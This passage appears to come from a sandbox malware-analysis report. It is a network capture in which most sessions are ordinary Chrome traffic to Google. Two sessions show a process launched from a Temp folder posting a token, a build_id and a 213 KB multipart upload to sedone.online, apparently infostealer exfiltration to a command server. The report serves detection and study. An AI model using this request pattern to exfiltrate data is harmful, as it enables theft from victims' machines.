2024-12-17 07:23:05 UTC	756	IN	Data Raw: 64 65 6e 20 72 69 6e 67 20 72 69 6e 67 20 6e 69 67 68 74 72 65 69 67 6e 22 2c 22 64 65 63 65 6d 62 65 72 20 66 75 6c 6c 20 6d 6f 6f 6e 20 63 6f 6c 64 20 6d 6f 6f 6e 22 2c 22 6e 79 74 20 6d 69 6e 69 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 69 6e 74 65 72 20 6d 69 61 6d 69 20 63 6c 75 62 20 61 6d 65 72 69 63 61 20 6c 61 73 20 76 65 67 61 73 22 2c 22 74 20 6d 6f 62 69 6c 65 20 73 74 61 72 6c 69 6e 6b 20 73 61 74 65 6c 6c 69 74 65 20 62 65 74 61 20 74 65 73 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 Data Ascii: den ring ring nightreign","december full moon cold moon","nyt mini crossword clues","inter miami club america las vegas","t mobile starlink satellite beta test"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinf
2024-12-17 07:23:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49942	172.217.19.228	443	7672	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:04 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49941	172.217.19.228	443	7672	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:04 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 07:23:05 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Tue, 17 Dec 2024 07:23:05 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-17 07:23:05 UTC	372	IN	Data Raw: 32 39 61 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 29a1)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700329,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d Data Ascii: or(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this.i\u003da}
2024-12-17 07:23:05 UTC	1390	IN	Data Raw: 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 62 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c Data Ascii: (\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"F\");else a\u003d_.be(a);return a};_.de\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\
2024-12-17 07:23:05 UTC	563	IN	Data Raw: 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e Data Ascii: ctor(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.pe\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.
2024-12-17 07:23:05 UTC	356	IN	Data Raw: 31 35 64 0d 0a 6c 65 6e 67 74 68 3a 5c 22 6d 61 78 4c 65 6e 67 74 68 5c 22 2c 6e 6f 6e 63 65 3a 5c 22 6e 6f 6e 63 65 5c 22 2c 72 6f 6c 65 3a 5c 22 72 6f 6c 65 5c 22 2c 72 6f 77 73 70 61 6e 3a 5c 22 72 6f 77 53 70 61 6e 5c 22 2c 74 79 70 65 3a 5c 22 74 79 70 65 5c 22 2c 75 73 65 6d 61 70 3a 5c 22 75 73 65 4d 61 70 5c 22 2c 76 61 6c 69 67 6e 3a 5c 22 76 41 6c 69 67 6e 5c 22 2c 77 69 64 74 68 3a 5c 22 77 69 64 74 68 5c 22 7d 3b 5c 6e 5f 2e 71 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 3b 5f 2e 74 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 72 65 28 61 2c 53 Data Ascii: 15dlength:\"maxLength\",nonce:\"nonce\",role:\"role\",rowspan:\"rowSpan\",type:\"type\",usemap:\"useMap\",valign:\"vAlign\",width:\"width\"};\n_.qe\u003dfunction(a){return a?a.defaultView:window};_.te\u003dfunction(a,b){const c\u003db[1],d\u003d_.re(a,S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49948	172.217.19.228	443	7672	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:05 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 07:23:06 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Tue, 17 Dec 2024 07:23:05 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-17 07:23:06 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-17 07:23:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49963	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:09 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:23:09 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 Data Ascii: ------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------L6XTRQ1VS0ZM7Q9HD26XCont
2024-12-17 07:23:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Dec 2024 07:23:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-17 07:23:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49969	116.203.12.114	443	1252	C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp	Bytes transferred	Direction	Data
2024-12-17 07:23:11 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1NG4W4EKNGVAAAIM7GDJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-17 07:23:11 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 4e 47 34 57 34 45 4b 4e 47 56 41 41 41 49 4d 37 47 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 64 34 64 30 35 37 36 34 30 37 61 37 37 33 31 32 37 64 62 32 37 37 33 34 65 36 61 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 47 34 57 34 45 4b 4e 47 56 41 41 41 49 4d 37 47 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 47 34 57 34 45 4b 4e 47 56 41 41 41 49 4d 37 47 44 4a 0d 0a 43 6f 6e 74 Data Ascii: ------1NG4W4EKNGVAAAIM7GDJContent-Disposition: form-data; name="token"dd4d0576407a773127db27734e6a6603------1NG4W4EKNGVAAAIM7GDJContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------1NG4W4EKNGVAAAIM7GDJCont
2024-12-17 07:23:11 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 07:23:11 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 